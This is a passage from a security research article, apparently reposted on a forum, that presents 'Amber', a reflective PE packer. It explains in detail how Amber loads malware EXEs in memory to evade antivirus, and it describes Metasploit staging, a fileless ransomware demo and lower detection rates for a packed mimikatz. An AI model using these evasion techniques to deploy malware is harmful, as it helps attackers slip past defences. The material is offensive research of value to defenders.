Process Hollowing[5] is another commonly known in-memory malware execution method that is using the documented Windows API functions for creating a new process and mapping an EXE file inside it. This method is popular among crypters and packers that are designed to decrease the detection rate of malwares. But this method also has several drawbacks. Because of the Address Space Layout Randomization (ASLR) security measure inside the up-to-date Windows operating systems, the address of memory region when creating a new process is randomized, because of this process hollowing also needs to implement image base relocation on up-to-date Windows systems. As mentioned earlier, base relocation requires relocation data inside PE files. Another drawback is because of the usage of specific file mapping and process creation API functions in specific order this method is easy to identify by security products. Hyperion[6] is a crypter for PE files, developed and presented by Christian Amman in 2012. It explains the theoretic aspects of runtime crypters and how to implement it. The PE parsing approach in assembly and the design perspective used while developing Hyperion helped us for our POC packer. Technical Details of our new packing method: Amber The fundamental principle of executing a compiled binary inside the OS memory is possible with imitating the PE loader of the OS. On Windows, PE loader does many important things, between them mapping a file to memory and resolving the addresses of imported functions are the most important stages for executing a EXE file. Current methods for executing EXE files in memory uses specific windows API functions for mimicking the windows PE loader. Common approach is to create a new suspended process with calling CreateProcess windows API function and mapping the entire EXE image inside it with the help of NtMapViewOfSection, MapViewOfFileand CreateFileMapping functions. Usage of such functions indicates suspicious behavior and increases the detection possibility of the malware. One of the key aspects while developing our packer is using less API functions as possible. In order to avoid the usage of suspicious file mapping API functions our packer uses premapped PE images moreover execution of the malware occurs inside of the target process itself without using the CreateProcess windows API function. The malware executed inside the target process is run with the same process privileges because of the shared _TEB block which is containing the privilege information and configuration of a process. Amber has 2 types of stub, one of them is designed for EXE files that are supporting the ASLR and the other one is for EXE files that are stripped or doesn’t have any relocation data inside. The ASLR supported stub uses total of 4 windows API calls and other stub only uses 3 that are very commonly used by majority of legitimate applications. ASLR Supported Stub: VirtualAlloc CreateThread LoadLibraryA GetProcAddress Non-ASLR Stub: VirtualProtect LoadLibraryA GetProcAddress In order to call these API’s on runtime Amber uses a publicly known EAT parsing technique that is used by Stephen Fewer’s Reflective DLL injection[4] method. This technique simply locates the InMemoryOrderModuleList structure with navigating through Process Environment Block (PEB) inside memory. After locating the structure it is possible to reach export tables of all loaded DLLs with reading each _LDR_DATA_TABLE_ENTRY structure pointed by the InMemoryOrderModuleList. After reaching the export table of a loaded DLL it compares the previously calculated ROR (rotate right) 13 hash of each exported function name until a match occurs. Amber’s packing method also provides several alternative windows API usage methods, one of them is using fixed API addresses, this is the best option if the user is familiar on the remote process that will host the Amber payload. Using fixed API addresses will directly bypass the latest OS level exploit mitigations that are inspecting export address table calls also removing API address finding code will reduce the overall payload size. Another alternative techniques can be used for locating the addresses of required functions such as IAT parsing technique used by Josh Pitts in “Teaching Old Shellcode New Tricks”[7] presentation. Current version of Amber packer versions only supports Fixed API addresses and EAT parsing techniques but IAT parsing will be added on next versions. Generating the Payload For generating the actual Amber payload first packer creates a memory mapping image of the malware, generated memory mapping file contains all sections, optional PE header and null byte padding for unallocated memory space between sections. After obtaining the mapping of the malware, packer checks the ASLR compatibility of the supplied EXE, if the EXE is ASLR compatible packer adds the related Amber stub if not it uses the stub for EXE files that has fixed image base. From this point Amber payload is completed. Below image describes the Amber payload inside the target process, ASLR Stub Execution Execution of ASLR supported stub consists of 5 phases, Base Allocation Resolving API Functions Base Relocation Placement Of File Mapping Execution At the base allocation phase stub allocates a read/write/execute privileged memory space at the size of mapped image of malware with calling the VirtualAlloc windows API function, This memory space will be the new base of malware after the relocation process. In the second phase Amber stub will resolve the addresses of functions that is imported by the malware and write the addresses to the import address table of the mapped image of malware. Address resolution phase is very similar to the approach used by the PE loader of Windows, Amber stub will parse the import table entries of the mapped malware image and load each DLL used by the malware with calling the LoadLibraryA windows API function, each _IMAGE_IMPORT_DESCRIPTOR entry inside import table contains pointer to the names of loaded DLL’s as string, stub will take advantage of existing strings and pass them as parameters to the LoadLibraryA function, after loading the required DLL Amber stub saves the DLL handle and starts finding the addresses of imported functions from the loaded DLL with the help of GetProcAddress windows API function, _IMAGE_IMPORT_DESCRIPTOR structure also contains a pointer to a structure called import names table, this structure contains the names of the imported functions in the same order with import address table(IAT), before calling the GetProcAddress function Amber stub passes the saved handle of the previously loaded DLL and the name of the imported function from import name table structure. Each returned function address is written to the malwares import address table (IAT) with 4 padding byte between them. This process continuous until the end of the import table, after loading all required DLL’s and resolving all the imported function addresses second phase is complete. At the third phase Amber stub will start the relocation process with adjusting the addresses according to the address returned by the VirtualAlloc call, this is almost the same approach used by the PE loader of the windows itself, stub first calculates the delta value with the address returned by the VirtualAlloc call and the preferred base address of the malware, delta value is added to the every entry inside the relocation table. In fourth phase Amber stub will place the file mapping to the previously allocated space, moving the mapped image is done with a simple assembly loop that does byte by byte move operation. At the final phase Amber stub will create a new thread starting from the entry point of the malware with calling the CreateThread API function. The reason of creating a new thread is to create a new growable stack for the malware and additionally executing the malware inside a new thread will allow the target process to continue from its previous state. After creating the malware thread stub will restore the execution with returning to the first caller or stub will jump inside a infinite loop that will stall the current thread while the malware thread successfully runs. Non-ASLR Stub Execution Execution of Non-ASLR supported stub consists of 4 phases, Base Allocation Resolving API functions Placement Of File Mapping Execution If the malware is stripped or has no relocation data inside there is no other way than placing it to its preferred base address. In such condition stub tries to change the memory access privileges of the target process with calling VirtualProtect windows API function starting from image base of the malware through the size of the mapped image. If this condition occurs preferred base address and target process sections may overlap and target process will not be able to continue after the execution of Amber payload. Fixed Amber stub may not be able to change the access privileges of the specified memory region, this may have multiple reasons such as specified memory range is not inside the current process page boundaries (reason is most probably ASLR) or the specified address is overlapping with the stack guard regions inside memory. This is the main limitation for Amber payloads, if the supplied malware don’t have ASLR support (has no relocation data inside) and stub can’t change the memory access privileges of the target process payload execution is not possible. In some situations stub successfully changes the memory region privileges but process crashes immediately, this is caused by the multiple threads running inside the overwritten sections. If the target process owns multiple threads at the time of fixed stub execution it may crash because of the changing memory privileges or overwriting to a running section. However these limitations doesn’t matter if it’s not using the multi stage infection payload with fixed stub, current POC packer can adjust the image base of generated EXE file and the location of Amber payload accordingly. If the allocation attempt ends up successful first phase is complete. Second phase is identical with the approach used by the ASLR supported stub. After finishing the resolution of the API addresses, same assembly loop used for placing the completed file mapping to the previously amended memory region. At the final phase stub jumps to the entry point of the malware and starts the execution without creating a new thread. Unfortunately, usage of Non-ASLR Amber stub does not allow the target process to continue with its previous state. Multi Stage Applications Security measures that will be taken by operating systems in the near future will shrink the attack surface even more for malwares. Microsoft has announced Windows 10 S on May 2 2017[8], this operating system is basically a configured version of Windows 10 for more security, one of the main precautions taken by this new operating system is doesn’t allow to install applications other than those from Windows Store. This kind of white listing approach adopted by the operating systems will have a huge impact on malwares that is infecting systems via executable files. In such scenario usage of multi stage in-memory execution payloads becomes one of the most effective attack vectors. Because of the position independent nature of the Amber stubs it allows multi stage attack models, current POC packer is able to generate a stage payload from a complex compiled PE file that can be loaded and executed directly from memory like a regular shellcode injection attack. In such overly restrictive systems multi stage compatibility of Amber allows exploitation of common memory based software vulnerabilities such as stack and heap based buffer overflows. However due to the limitations of the fixed Amber stub it is suggested to use ASLR supported EXE files while performing multi stage infection attacks. Stage payloads generated by the POC packer are compatible with the small loader shellcodes and payloads generated from Metasploit Framework [9], this also means Amber payloads can be used with all the exploits inside the Metasploit Framework [9] that is using the multi stage meterpreter shellcodes. Here is the source code of Amber . Feel free to fork and contribute..! https://github.com/EgeBalci/Amber Demo 1 – Deploying EXE files through metasploit stagers This video demonstrates how to deploy regular EXE files into systems with using the stager payloads of metasploit. The Stage.exe file generated from Metasploit fetches the amber’s stage payload and executes inside the memory. Demo 2 – Deploying fileless ransomware with Amber ( 3 different AV ) This video is a great example of a possible ransomware attack vector. With using amber, a ransomware EXE file packed and deployed to a remote system via fileless powershell payload. This attack can also be replicated with using any kind of buffer overflow vulnerability. Detection Rate Current detection rate (19.10.2017) of the POC packer is pretty satisfying but since this is going to be a public project current detection score will rise inevitably When no extra parameters passed (only the file name) packer generates a multi stage payload and performs an basic XOR cipher with a multi byte random key then compiles it into a EXE file with adding few extra anti detection functions. Generated EXE file executes the stage payload like a regular shellcode after deciphering the payload and making the required environmental checks. This particular sample is the mimikatz.exe (sha256 – 9369b34df04a2795de083401dda4201a2da2784d1384a6ada2d773b3a81f8dad) file packed with a 12 byte XOR key (./amber mimikatz.exe -ks 12). The detection rate of the mimikatz.exe file before packing is 51/66 on VirusTotal. In this particular example packer uses the default way to find the windows API addresses witch is using the hash API, avoiding the usage of hash API will decrease the detection rate. Currently packer supports the usage of fixed addresses of IAT offsets also next versions will include IAT parser shellcodes for more alternative API address finding methods. VirusTotal https://www.virustotal.com/#/file/3330d02404c56c1793f19f5d18fd5865cadfc4bd015af2e38ed0671f5e737d8a/detection VirusCheckmate Result http://viruscheckmate.com/id/1ikb99sNVrOM NoDistribute https://nodistribute.com/result/image/7uMa96SNOY13rtmTpW5ckBqzAv.png Future Work This work introduces a new generation malware packing methodology for PE files but does not support .NET executables, future work may include the support for 64 bit PE files and .NET executables. Also in terms of stealthiness of this method there can be more advancement. Allocation of memory regions for entire mapped image done with read/write/execute privileges, after placing the mapped image changing the memory region privileges according to the mapped image sections may decrease the detection rate. Also wiping the PE header after the address resolution phase can make detection harder for memory scanners. The developments of Amber POC packer will continue as a open source project. References [1] Ramilli, Marco, and Matt Bishop. “Multi-stage delivery of malware.” Malicious and Unwanted Software (MALWARE), 2010 5th International Conference on. IEEE, 2010. [2] Gavriluţ, Dragoş, et al. “Malware detection using machine learning.” Computer Science and Information Technology, 2009. IMCSIT’09. International Multiconference on. IEEE, 2009. [3] Rieck, Konrad, et al. “Automatic analysis of malware behavior using machine learning.” Journal of Computer Security 19.4 (2011): 639-668. [4] Fewer, Stephen. “Reflective DLL injection.” Harmony Security, Version 1 (2008). [5] Leitch, John. “Process hollowing.” (2013). [6] Ammann, Christian. “Hyperion: Implementation of a PE-Crypter.” (2012). [7] Pitts, Josh. “Teaching Old Shellcode New Tricks” https://recon.cx/2017/brussels/resources/slides/RECON-BRX-2017 Teaching_Old_Shellcode_New_Tricks.pdf (2017) [8] https://news.microsoft.com/europe/2017/05/02/microsoft-empowers-students-and-teachers-with-windows-10-s-affordable-pcs-new-surface-laptop-and-more/ [9] Rapid7 Inc, Metasploit Framework https://www.metasploit.com [10] Desimone, Joe. “Hunting In Memory” https://www.endgame.com/blog/technical-blog/hunting-memory (2017) [11] Lyda, Robert, and James Hamrock. “Using entropy analysis to find encrypted and packed malware.” IEEE Security & Privacy 5.2 (2007). [12] Nasi, Emeric. “PE Injection Explained Advanced memory code injection technique” Creative Commons Attribution-NonCommercial-NoDerivs 3.0 License (2014) [13] Pietrek, Matt. “Peering Inside the PE: A Tour of the Win32 Portable Executable File Format” https://msdn.microsoft.com/en-us/library/ms809762.aspx (1994) Sursa: https://pentest.blog/introducing-new-packing-method-first-reflective-pe-packer/
  50. 1 point
    Salutare la colegii din SRI!
×